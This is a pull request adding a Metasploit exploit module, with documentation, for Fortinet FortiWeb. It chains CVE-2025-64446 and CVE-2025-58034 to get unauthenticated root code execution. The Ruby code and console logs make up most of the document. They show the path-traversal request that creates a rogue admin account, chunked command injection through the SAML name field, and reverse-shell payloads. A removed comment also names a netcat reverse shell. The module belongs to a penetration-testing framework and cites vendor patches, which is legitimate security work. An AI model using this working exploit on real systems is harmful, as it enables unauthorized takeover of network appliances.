### PR TITLE
Add exploit module for Fortinet FortiWeb (CVE-2025-64446 + CVE-2025-58034)

### DIFF
--- a/documentation/modules/exploit/linux/http/fortinet_fortiweb_rce.md
+++ b/documentation/modules/exploit/linux/http/fortinet_fortiweb_rce.md
@@ -1,0 +1,203 @@
+## Vulnerable Application
+This exploit module exploits an authentication bypass via path traversal vulnerability in the Fortinet
+FortiWeb management interface to create a new local administrator user account. From there a command
+injection vulnerability is leveraged to achieve RCE with root privileges.
+
+The auth bypass `CVE-2025-64446` affects the following versions:
+
+* FortiWeb `8.0.0` through `8.0.1` (Patched in `8.0.2` and above)
+* FortiWeb `7.6.0` through `7.6.4` (Patched in `7.6.5` and above)
+* FortiWeb `7.4.0` through `7.4.9` (Patched in `7.4.10` and above)
+* FortiWeb `7.2.0` through `7.2.11` (Patched in `7.2.12` and above)
+* FortiWeb `7.0.0` through `7.0.11` (Patched in `7.0.12` and above)
+
+The command injection `CVE-2025-58034` affects the following versions (Note the `7.6` and `7.4` branches are very
+slightly different when compared to the patch versions for `CVE-2025-64446`:
+
+* FortiWeb `8.0.0` through `8.0.1` (Patched in `8.0.2` and above)
+* FortiWeb `7.6.0` through `7.6.5` (Patched in `7.6.6` and above) *<-- slight difference*
+* FortiWeb `7.4.0` through `7.4.10` (Patched in `7.4.11` and above) *<-- slight difference*
+* FortiWeb `7.2.0` through `7.2.11` (Patched in `7.2.12` and above)
+* FortiWeb `7.0.0` through `7.0.11` (Patched in `7.0.12` and above)
+
+## Testing
+Download a suitable FortiWeb-VM image and create a new VM. When creating the VM, assign the first network interface to a
+network you can target later (e.g. your external network), optionally, assign the second network interface to a private
+network. Power on the VM, and login to the console with the default username `admin` and a blank password. You will be
+asked to create a new admin password. Once you are at the CLI, you can assign an IP address to the management
+interface (on `port1`) for your (external) network:
+
+```
+FortiWeb # config system interface 
+
+FortiWeb (interface) # edit port1 
+
+FortiWeb (port1) # set ip 192.168.86.200 255.255.255.0
+
+FortiWeb (port1) # end
+
+FortiWeb #
+```
+
+You should now be able to access the management interface via HTTPS, e.g. `https://192.168.86.200/login`.
+
+## Options
+The following advanced options do not need to be changed against a target in a default configuration.
+
+### FortiWebAdminUsername
+A valid admin username to use. A new admin account will be created if not specified. (Defaults to a random value).
+
+### FortiWebAdminPassword
+A valid admin password to use. A new admin account will be created if not specified. (Defaults to a random value).
+
+### FortiWebAccessProfile
+The access profile to use for the new admin account (Defaults to `prof_admin`).
+
+### FortiWebDomain
+The domain to use for the new admin account (Defaults to `root`).
+
+### FortiWebDefaultAdminAccount
+The default FortiWeb admin account name (Defaults to `admin`).
+
+### FortiWebWritableDir
+The full path of a writable directory on the target (Defaults to `/tmp`).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/fortinet_fortiweb_rce`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443)
+5. `set SSL true` (Or set to false if targeting HTTP)
+
+Configure the payload to execute:
+
+6. `set PAYLOAD cmd/unix/reverse_bash`
+7. `set RHOST eth0`
+8. `set RPORT 4444`
+
+_Note: only these payloads have been verified to work:_
+* `cmd/unix/reverse_bash`
+* `cmd/unix/reverse_openssl`
+* `cmd/unix/reverse_python`
+
+Run the module:
+
+9. `check`
+10. `exploit`
+
+## Scenarios
+
+### Example 1 (CVE-2025-64446 + CVE-2025-58034)
+
+In this example, `CVE-2025-64446` is used to create a new admin account and then `CVE-2025-58034` is used
+to execute a payload. This chain gives unauthenticated RCE and is the default operation of the exploit module.
+
+```
+msf > use exploit/linux/http/fortinet_fortiweb_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf exploit(linux/http/fortinet_fortiweb_rce) > set RHOST 192.168.86.202
+RHOST => 192.168.86.202
+msf exploit(linux/http/fortinet_fortiweb_rce) > set LHOST eth0
+LHOST => eth0
+msf exploit(linux/http/fortinet_fortiweb_rce) > show options 
+
+Module options (exploit/linux/http/fortinet_fortiweb_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
+   RHOSTS     192.168.86.202   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(linux/http/fortinet_fortiweb_rce) > check
+[*] 192.168.86.202:443 - The target appears to be vulnerable.
+msf exploit(linux/http/fortinet_fortiweb_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Creating a new admin account via CVE-2025-64446...
+[+] New admin account successfully created: isela_fritsch:LpWXiFof
+[*] Logging in...
+[+] Successfully logged in as isela_fritsch
+[*] Executing payload via CVE-2025-58034...
+[*] Uploading bootstrap payload chunk 1 of 4...
+[*] Uploading bootstrap payload chunk 2 of 4...
+[*] Uploading bootstrap payload chunk 3 of 4...
+[*] Uploading bootstrap payload chunk 4 of 4...
+[*] Amalgamating bootstrap payload chunks...
+[*] Executing bootstrap payload...
+[+] Finished.
+[*] Command shell session 1 opened (192.168.86.122:4444 -> 192.168.86.202:19470) at 2025-11-21 11:33:33 +0000
+
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux FortiWeb 6.1.62 #1 SMP Fri Aug 22 21:26:25 UTC 2025 x86_64 GNU/Linux
+cat /VERSION
+8.0.1-B0047
+exit
+[*] 192.168.86.202 - Command shell session 1 closed.
+```
+
+### Example 2 (CVE-2025-58034)
+
+In this example, the attacker has existing admin credentials, so only `CVE-2025-58034` is used
+to execute a payload.
+
+```
+msf exploit(linux/http/fortinet_fortiweb_rce) > set FortiWebAdminUsername hax0r
+FortiWebAdminUsername => hax0r
+msf exploit(linux/http/fortinet_fortiweb_rce) > set FortiWebAdminPassword hax0r
+FortiWebAdminPassword => hax0r
+msf exploit(linux/http/fortinet_fortiweb_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Using existing admin credentials: hax0r:hax0r
+[*] Logging in...
+[+] Successfully logged in as hax0r
+[*] Executing payload via CVE-2025-58034...
+[*] Uploading bootstrap payload chunk 1 of 4...
+[*] Uploading bootstrap payload chunk 2 of 4...
+[*] Uploading bootstrap payload chunk 3 of 4...
+[*] Uploading bootstrap payload chunk 4 of 4...
+[*] Amalgamating bootstrap payload chunks...
+[*] Executing bootstrap payload...
+[+] Finished.
+[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.202:3684) at 2025-11-21 11:34:57 +0000
+
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux FortiWeb 6.1.62 #1 SMP Fri Aug 22 21:26:25 UTC 2025 x86_64 GNU/Linux
+cat /VERSION
+8.0.1-B0047
+exit
+[*] 192.168.86.202 - Command shell session 2 closed.
+```

--- a/documentation/modules/exploit/linux/http/fortinet_fortiweb_rce.md
+++ b/documentation/modules/exploit/linux/http/fortinet_fortiweb_rce.md
@@ -82,7 +82,6 @@ Configure the payload to execute:
 _Note: only these payloads have been verified to work:_
 * `cmd/unix/reverse_bash`
 * `cmd/unix/reverse_openssl`
-* `cmd/unix/reverse_python`
 
 Run the module:
 

--- a/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.rb
+++ b/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.rb
@@ -46,7 +46,8 @@ class MetasploitModule < Msf::Auxiliary
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS],
+          'RelatedModules' => ['exploit/linux/http/fortinet_fortiweb_rce']
         }
       )
     )

--- a/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
+++ b/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
@@ -108,7 +108,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Safe('Received a 403 Forbidden response') if res.code == 403
 
-    Exploit::CheckCode::Appears
+    j = JSON.parse(res.body)
+
+    return Exploit::CheckCode::Appears if j.dig('results', 'message') == 'Empty value isn\'t allowed.'
+
+    CheckCode::Unknown('Unexpected JSON results')
+  rescue JSON::ParserError
+    return CheckCode::Unknown('Failed to parse JSON body')
   end
 
   def exploit

--- a/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
+++ b/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
@@ -1,0 +1,398 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Rex::Proto::Http::WebSocket
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Fortinet FortiWeb unauthenticated RCE',
+        'Description' => %q{
+          This exploit module exploits an authentication bypass via path traversal vulnerability in the Fortinet
+          FortiWeb management interface to create a new local administrator user account. From there a command
+          injection vulnerability is leveraged to achieve RCE with root privileges.
+
+          The auth bypass CVE-2025-64446 affects the following versions:
+
+          * FortiWeb 8.0.0 through 8.0.1 (Patched in 8.0.2 and above)
+          * FortiWeb 7.6.0 through 7.6.4 (Patched in 7.6.5 and above)
+          * FortiWeb 7.4.0 through 7.4.9 (Patched in 7.4.10 and above)
+          * FortiWeb 7.2.0 through 7.2.11 (Patched in 7.2.12 and above)
+          * FortiWeb 7.0.0 through 7.0.11 (Patched in 7.0.12 and above)
+
+          The command injection CVE-2025-58034 affects the following versions (Note the 7.6 and 7.4 branches are very
+          slightly different when compared to the patch versions for CVE-2025-64446:
+
+          * FortiWeb 8.0.0 through 8.0.1 (Patched in 8.0.2 and above)
+          * FortiWeb 7.6.0 through 7.6.5 (Patched in 7.6.6 and above) <-- slight difference
+          * FortiWeb 7.4.0 through 7.4.10 (Patched in 7.4.11 and above) <-- slight difference
+          * FortiWeb 7.2.0 through 7.2.11 (Patched in 7.2.12 and above)
+          * FortiWeb 7.0.0 through 7.0.11 (Patched in 7.0.12 and above)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Defused', # PoC from honeypot for CVE-2025-64446
+          'sfewer-r7', # MSF module and CVE-2025-58034 analysis
+        ],
+        'References' => [
+          ['CVE', '2025-64446'], # Auth bypass
+          ['CVE', '2025-58034'], # Command Injection
+          ['URL', 'https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis'], # Analysis of CVE-2025-58034
+          ['URL', 'https://x.com/defusedcyber/status/1975242250373517373'], # Original PoC for CVE-2025-64446 posted online
+          ['URL', 'https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass'], # PoC for CVE-2025-64446
+          ['URL', 'https://www.pwndefend.com/2025/11/13/suspected-fortinet-zero-day-exploited-in-the-wild/'],
+          ['URL', 'https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/'],
+          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-25-910'], # Vendor advisory for CVE-2025-64446
+          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-25-513'] # Vendor advisory for CVE-2025-58034
+        ],
+        # CVE-2025-64446 was disclosed on Nov 14, 2025, CVE-2025-58034 was disclosed on Nov 18, 2025.
+        # Both vulnerabilities were silently patched by the vendor prior to this date.
+        'DisclosureDate' => '2025-11-14',
+        'Privileged' => true, # Executes as root.
+        'Platform' => 'unix', # Only some of the unix payloads have been verified to work, the Linux fetch payloads dont execute.
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            # NOTE: Tested with the following payloads against a vulnerable FortiWeb 8.0.1:
+            #   cmd/unix/reverse_bash
+            #   cmd/unix/reverse_openssl
+            #   cmd/unix/reverse_python
+            'Default', {}
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
+          'RPORT' => 443,
+          'SSL' => true,
+          # The maximum time in seconds to wait for a session.
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS],
+          'RelatedModules' => ['auxiliary/admin/http/fortinet_fortiweb_create_admin']
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options(
+      [
+        OptString.new('FortiWebAdminUsername', [false, 'A valid admin username to use. A new admin account will be created if not specified.', nil]),
+        OptString.new('FortiWebAdminPassword', [false, 'A valid admin password to use. A new admin account will be created if not specified.', nil]),
+        OptString.new('FortiWebAccessProfile', [ true, 'The access profile to use for the new admin account', 'prof_admin' ]),
+        OptString.new('FortiWebDomain', [ true, 'The domain to use for the new admin account', 'root' ]),
+        OptString.new('FortiWebDefaultAdminAccount', [ true, 'The default FortiWeb admin account name', 'admin' ]),
+        OptString.new('FortiWebWritableDir', [true, 'The full path of a writable directory on the target.', '/tmp'])
+      ]
+    )
+  end
+
+  def check
+    res = post_auth_bypass_request({ data: {} })
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return Exploit::CheckCode::Safe('Received a 403 Forbidden response') if res.code == 403
+
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if datastore['FortiWebAdminUsername'].nil? || datastore['FortiWebAdminPassword'].nil?
+      print_status('Creating a new admin account via CVE-2025-64446...')
+
+      admin_username = Faker::Internet.username
+      admin_password = Rex::Text.rand_text_alpha(8)
+
+      create_admin_account(admin_username, admin_password)
+
+      print_good("New admin account successfully created: #{admin_username}:#{admin_password}")
+    else
+      admin_username = datastore['FortiWebAdminUsername']
+      admin_password = datastore['FortiWebAdminPassword']
+
+      print_good("Using existing admin credentials: #{admin_username}:#{admin_password}")
+    end
+
+    print_status('Logging in...')
+
+    cookie_jar.clear
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'logincheck'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'username' => admin_username,
+        'secretkey' => admin_password
+      }
+    )
+
+    fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Connection failed.') unless res
+
+    fail_with(Msf::Exploit::Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200
+
+    unless cookie_jar.cookies.find { |c| c.name.start_with? 'APSCOOKIE_FWEB' }
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, 'No APSCOOKIE_FWEB returned')
+    end
+
+    print_good("Successfully logged in as #{admin_username}")
+
+    begin
+      print_status('Executing payload via CVE-2025-58034...')
+
+      execute_payload
+    rescue Rex::Proto::Http::WebSocket::ConnectionError => e
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, "CLI websocket connection error: #{e}")
+    end
+
+    print_good('Finished.')
+
+    # XXX: Calling connect_ws will in turn call HttpClient connect. This will update self.client to the new HttpClient
+    # for the websocket connection. For reasons currently unknown, this kills the incoming session socket back to
+    # the handler (We generate an EOFError for unknown reasons in Msf::Sessions::CommandShell#shell_read). The solution
+    # is to ensure self.client is not modified by connect_ws.
+    # XXX: We now get a situation where the new session will last for a few minutes before being killed for the same
+    # (unknown) reason as above.
+    # XXX: If we execute_cmd("nc 192.168.86.35 4444 -e /bin/bash") instead of execute_payload, and use a netcat
+    # listener, the issue is not present. The issue appears to be on the framework side.
+    self.client = nil
+  end
+
+  def execute_payload
+    tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
+
+    bootstrap_payload = "rm -f #{datastore['FortiWebWritableDir']}/#{tmp_file_name}*;#{payload.encoded}"
+
+    vprint_status("Using bootstrap payload: #{bootstrap_payload}")
+
+    bootstrap_payload = Base64.strict_encode64(bootstrap_payload)
+
+    idx = 1
+    idx_prefix = ''
+
+    # Our command injection can at most be 63 characters. We need 2 characters for a double back tick, and
+    # 23 for the echo command that writes the chunk to a file (assuming a path of /tmp and a single digit idx
+    # value). So by default, the chunk size will be 38. However, this may change as we write the chunks.
+    # To ensure the `cat tmp_file_name*` command amalgamates the files in the correct order, if an idx goes above 9,
+    # we reset the idx back to 1, and append a '9' character to an idx_prefix variable. This will ensure we get
+    # sequential files, for example tmp1, tmp2, ..., tmp9, tmp91, tmp92, ..., tmp99, tmp991, tmp992, ...
+    # A result of appending a character to the idx_prefix variable, is we can write 1 less character in the chunk, so
+    # we must recompute the chunk size, to ensure we don't go over the 63-character limit.
+    chunk_size = 63 - 2 - "echo -n |tee #{datastore['FortiWebWritableDir']}/#{tmp_file_name}#{idx_prefix}#{idx}".length
+
+    # We write to a file via tee, as the > character is a bad char (so we cant do "echo foo > file" and
+    # instead do "echo foo|tee file").
+
+    # We also base64 encode the data we write, as single and double quotes are also bad chars, so we cant write
+    # them, and therefore white spaces are also an issue.
+
+    # We display the progress to the user, so track that with a current and max chunk number.
+    curr_chunk_number = 1
+
+    max_chunk_number = (bootstrap_payload.length / chunk_size) + 1
+
+    while bootstrap_payload && !bootstrap_payload.empty?
+
+      print_status("Uploading bootstrap payload chunk #{curr_chunk_number} of #{max_chunk_number}...")
+
+      chunk = bootstrap_payload[0, chunk_size]
+
+      bootstrap_payload = bootstrap_payload[chunk_size..]
+
+      execute_cmd("echo -n #{chunk}|tee #{datastore['FortiWebWritableDir']}/#{tmp_file_name}#{idx_prefix}#{idx}")
+
+      idx += 1
+
+      if idx > 9
+        idx = 1
+        idx_prefix += '9'
+        # Adjust chunk_size, as the idx_prefix value has had a '9' character appended to it, so the
+        # next chunk must have 1 less character.
+        chunk_size -= 1
+        # If the payload was too big, and we run out of space in the command to write any chunk data, fail.
+        # This is unlikely to occur in practise, as the MSF payload command would need to be very large to exhaust the
+        # available space to write it. Back of a napkin calculation would be for every 9 chunks we get 1 less
+        # character, so starting with a chunk size of 36, we have (36 * 9) + (35 * 9) + (34 * 9), ... + (1 * 9), which
+        # would be a max MSF payload size of 5670 characters. Calculated with the command:
+        # ruby -e "sz=0; 1.upto(36){ |i| sz += ((36-i)*9) };p sz"
+        fail_with(Failure::BadConfig, 'No more space in the command to write chunk data, choose a smaller payload') if chunk_size.zero?
+      end
+
+      curr_chunk_number += 1
+    end
+
+    print_status('Amalgamating bootstrap payload chunks...')
+
+    execute_cmd("cat #{datastore['FortiWebWritableDir']}/#{tmp_file_name}*|tee #{datastore['FortiWebWritableDir']}/#{tmp_file_name}")
+
+    print_status('Executing bootstrap payload...')
+
+    execute_cmd("cat #{datastore['FortiWebWritableDir']}/#{tmp_file_name}|base64 -d|sh")
+  end
+
+  def execute_cmd(cmd)
+    vprint_status("Executing OS command: #{cmd}")
+
+    # These bad chars are not allowed in a SAML config name, which is the command injecton we leverage.
+    # We also look for backticks, which are allowed, but we use two of them below to get command execution so we
+    # dont want the incoming cmd to contain any as that would break our injection.
+    '`#()>\'"'.each_char do |bad_char|
+      fail_with(Failure::BadConfig, "Bad cmd char #{bad_char} in execute_cmd") if cmd.include? bad_char
+    end
+
+    # The max name length is 63 characters, less 2 for the double backtick, so 61 are available for the OS command.
+    fail_with(Failure::BadConfig, 'Command too long for execute_cmd') if cmd.length > (63 - 2)
+
+    vprint_status('Connecting to the CLI websocket...')
+
+    wsock_headers = {
+      'Cookie' => ''
+    }
+
+    cookie_jar.cookies.each do |c|
+      wsock_headers['Cookie'] += "#{c}; "
+    end
+
+    wsock = connect_ws(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ws', 'cli', 'open'),
+      'headers' => wsock_headers
+    )
+
+    vprint_good('Successfully connected to the CLI websocket')
+
+    cli_commands = [
+      'config user saml-user',
+      "edit \"`#{cmd}`\"",
+      "set entityID http://#{Rex::Text.rand_text_alpha(4..8)}",
+      "set service-path /#{Rex::Text.rand_text_alpha(4..8)}",
+      'set enforce-signing disable',
+      'set slo-bind post',
+      "set slo-path /#{Rex::Text.rand_text_alpha(4..8)}",
+      'set sso-bind post',
+      "set sso-path /#{Rex::Text.rand_text_alpha(4..8)}",
+      'end'
+    ]
+
+    wsock.wsloop do |buffer, _|
+      vprint_line(buffer)
+
+      if buffer.end_with? ' # '
+        cli_command = cli_commands.shift
+
+        break if cli_command.nil?
+
+        vprint_status("Running CLI command: #{cli_command}")
+
+        wsock.put_wsbinary("#{cli_command}\n")
+
+        break if cli_commands.empty?
+      end
+    end
+  end
+
+  # The FortiWeb reverse proxy/WebSocket server appears to be non-compliant. The "Upgrade" header is supposed to
+  # be case-insensitive, and by default Metasploit will use "WebSocket", however the FortiWeb device will only
+  # accept lower case, so we force "websocket" to be used instead.
+  def connect(opts = {})
+    if opts.dig('headers', 'Upgrade') == 'WebSocket'
+      opts['headers']['Upgrade'].downcase!
+    end
+    super
+  end
+
+  # Create a new local admin account via CVE-2025-64446.
+  def create_admin_account(admin_username, admin_password)
+    request_data = {
+      data: {
+        'q_type' => 1,
+        'name' => admin_username,
+        'access-profile' => datastore['FortiWebAccessProfile'],
+        'access-profile_val' => '0',
+        'trusthostv4' => '0.0.0.0/0',
+        'trusthostv6' => '::/0',
+        'last-name' => '',
+        'first-name' => '',
+        'email-address' => '',
+        'phone-number' => '',
+        'mobile-number' => '',
+        'hidden' => 0,
+        'domains' => datastore['FortiWebDomain'],
+        'sz_dashboard' => -1,
+        'type' => 'local-user',
+        'type_val' => '0',
+        'admin-usergrp_val' => '0',
+        'wildcard_val' => '0',
+        'accprofile-override_val' => '0',
+        'sshkey' => '',
+        'passwd-set-time' => 0,
+        'history-password-pos' => 0,
+        'history-password0' => '',
+        'history-password1' => '',
+        'history-password2' => '',
+        'history-password3' => '',
+        'history-password4' => '',
+        'history-password5' => '',
+        'history-password6' => '',
+        'history-password7' => '',
+        'history-password8' => '',
+        'history-password9' => '',
+        'force-password-change' => 'disable',
+        'force-password-change_val' => '0',
+        'password' => admin_password
+      }
+    }
+
+    res = post_auth_bypass_request(request_data)
+
+    fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Connection failed.') unless res
+
+    fail_with(Msf::Exploit::Failure::NotVulnerable, 'Target does not appear vulnerable (403 Forbidden response)') if res.code == 403
+
+    unless res.code == 200
+      if res.headers['Content-Type'] == 'application/json'
+        begin
+          response_data = JSON.parse(res.body)
+          print_bad(response_data.to_s)
+        rescue JSON::ParserError
+          print_bad('failed to parse response JSON data')
+        end
+      end
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Target returned an unexpected response (#{res.code})")
+    end
+  end
+
+  def post_auth_bypass_request(request_data)
+    cgi_info = {
+      'username' => datastore['FortiWebDefaultAdminAccount'],
+      'profname' => datastore['FortiWebAccessProfile'],
+      'vdom' => datastore['FortiWebDomain'],
+      'loginname' => datastore['FortiWebDefaultAdminAccount']
+    }
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi'),
+      'headers' => {
+        'CGIINFO' => Base64.strict_encode64(cgi_info.to_json)
+      },
+      'ctype' => 'application/json',
+      'data' => request_data.to_json
+    )
+  end
+end

--- a/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
+++ b/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
@@ -61,11 +61,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD],
         'Targets' => [
           [
-            # NOTE: Tested with the following payloads against a vulnerable FortiWeb 8.0.1:
+            # NOTE: Tested with the following payloads against a vulnerable FortiWeb 8.0.1 and 7.4.8:
             #   cmd/unix/reverse_bash
             #   cmd/unix/reverse_openssl
-            #   cmd/unix/reverse_python
-            'Default', {}
+            'Default', {
+              'Payload' => {
+                'BadChars' => '"'
+              }
+            }
           ]
         ],
         'DefaultTarget' => 0,
@@ -172,7 +175,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_payload
     tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
 
-    bootstrap_payload = "rm -f #{datastore['FortiWebWritableDir']}/#{tmp_file_name}*;nohup #{payload.encoded} &"
+    bootstrap_payload = "rm -f #{datastore['FortiWebWritableDir']}/#{tmp_file_name}*;"
+    # We need to detach our payload from the current session, as when the TCP connections from out HTTP(S) requests close,
+    # the device will tear down any child processes from the CLI, intern killing our payload prematurely. We would normally
+    # use the nohup command for this, however this is unavailable on certain versions (available on 8.0.1, unavailable
+    # on 7.4.8). To work around this, the bootstrap payload below will leverage Python, and use the Popen argument
+    # start_new_session to do essentially what nohup does - call setsid() to create a new session. This has been
+    # confirmed to work as expected on 8.0.1 and 7.4.8.
+    bootstrap_payload += "python -c \"import subprocess;subprocess.Popen(f\\\"#{payload.encoded}\\\",shell=True,start_new_session=True,stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)\""
 
     vprint_status("Using bootstrap payload: #{bootstrap_payload}")
 
@@ -244,9 +254,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_cmd(cmd)
     vprint_status("Executing OS command: #{cmd}")
 
-    # These bad chars are not allowed in a SAML config name, which is the command injecton we leverage.
+    # These bad chars are not allowed in a SAML config name, which is the command injection we leverage.
     # We also look for backticks, which are allowed, but we use two of them below to get command execution so we
-    # dont want the incoming cmd to contain any as that would break our injection.
+    # don't want the incoming cmd to contain any as that would break our injection.
     '`#()>\'"'.each_char do |bad_char|
       fail_with(Failure::BadConfig, "Bad cmd char #{bad_char} in execute_cmd") if cmd.include? bad_char
     end

--- a/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
+++ b/modules/exploits/linux/http/fortinet_fortiweb_rce.rb
@@ -161,22 +161,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_good('Finished.')
-
-    # XXX: Calling connect_ws will in turn call HttpClient connect. This will update self.client to the new HttpClient
-    # for the websocket connection. For reasons currently unknown, this kills the incoming session socket back to
-    # the handler (We generate an EOFError for unknown reasons in Msf::Sessions::CommandShell#shell_read). The solution
-    # is to ensure self.client is not modified by connect_ws.
-    # XXX: We now get a situation where the new session will last for a few minutes before being killed for the same
-    # (unknown) reason as above.
-    # XXX: If we execute_cmd("nc 192.168.86.35 4444 -e /bin/bash") instead of execute_payload, and use a netcat
-    # listener, the issue is not present. The issue appears to be on the framework side.
-    self.client = nil
   end
 
   def execute_payload
     tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
 
-    bootstrap_payload = "rm -f #{datastore['FortiWebWritableDir']}/#{tmp_file_name}*;#{payload.encoded}"
+    bootstrap_payload = "rm -f #{datastore['FortiWebWritableDir']}/#{tmp_file_name}*;nohup #{payload.encoded} &"
 
     vprint_status("Using bootstrap payload: #{bootstrap_payload}")
 


### PR DESCRIPTION
## Overview
This pull request add in a new exploit module targeting Fortinet FortiWeb via CVE-2025-64446 + CVE-2025-58034.

CVE-2025-64446 is an authentication bypass that lets a unauthenticated attacker create a new admin account on the target. For a technical analysis see the watchTowr [blog](https://labs.watchtowr.com/when-the-impersonation-function-gets-used-to-impersonate-users-fortinet-fortiweb-auth-bypass/).

CVE-2025-58034 is an authenticated command injection, that allows for root OS command execution. For a technical analysis see our [Rapid7 Analysis](https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis).

Chained together we get unauthenticated RCE.

## To-Do

I have opened this pull request as a draft while several outstanding issue are investigated.

  * [x] The fetch payloads don't work as any dropped binary cannot be made executable and therefor fails to run. I have not yet investigated the cause of this.
    * Investigated here (https://github.com/rapid7/metasploit-framework/pull/20717#issuecomment-3563765285) and wont be pursuing in this pull request.

  * [x] The session handler on the framework side has been observed to kill the session prematurely (an EOFError for unknown reasons in `Msf::Sessions::CommandShell#shell_read`). I could prevent this by clobbering the modules `self.client` HttpClient instance which is modified by the WebSocket mixin. I don't understand why this would impact the session handler though. Using a manually created netcat handler seems to avoids the issue (the session stays alive as expected), so I don't think the issue is on the target side.
    * This was resolved via [b8cefb1](https://github.com/rapid7/metasploit-framework/pull/20717/commits/b8cefb1af92e5d669e5f6e840983e49a33423290), turns out I just needed to add a `nohup`.

## Examples

### Example 1 (CVE-2025-64446 + CVE-2025-58034)

In this example, `CVE-2025-64446` is used to create a new admin account and then `CVE-2025-58034` is used
to execute a payload. This chain gives unauthenticated RCE and is the default operation of the exploit module.

```
msf > use exploit/linux/http/fortinet_fortiweb_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/fortinet_fortiweb_rce) > set RHOST 192.168.86.202
RHOST => 192.168.86.202
msf exploit(linux/http/fortinet_fortiweb_rce) > set LHOST eth0
LHOST => eth0
msf exploit(linux/http/fortinet_fortiweb_rce) > show options 

Module options (exploit/linux/http/fortinet_fortiweb_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS     192.168.86.202   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
